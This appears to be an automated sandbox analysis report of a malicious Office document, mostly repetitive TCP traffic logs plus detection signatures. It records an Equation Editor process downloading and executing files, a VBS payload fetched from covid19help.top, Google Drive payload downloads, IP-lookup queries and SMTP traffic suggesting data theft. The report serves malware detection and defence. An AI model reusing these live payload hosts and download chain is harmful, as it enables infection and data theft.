Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0062B84C

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 131.226.2.60:587

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.175.222 172.67.175.222
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

May check the online IP address of the machine

Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 131.226.2.60:587

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Transfusionist.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0062B84C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{27099B88-2DF0-47DA-B344-2C89EF146D55}.tmp

Jump to behavior

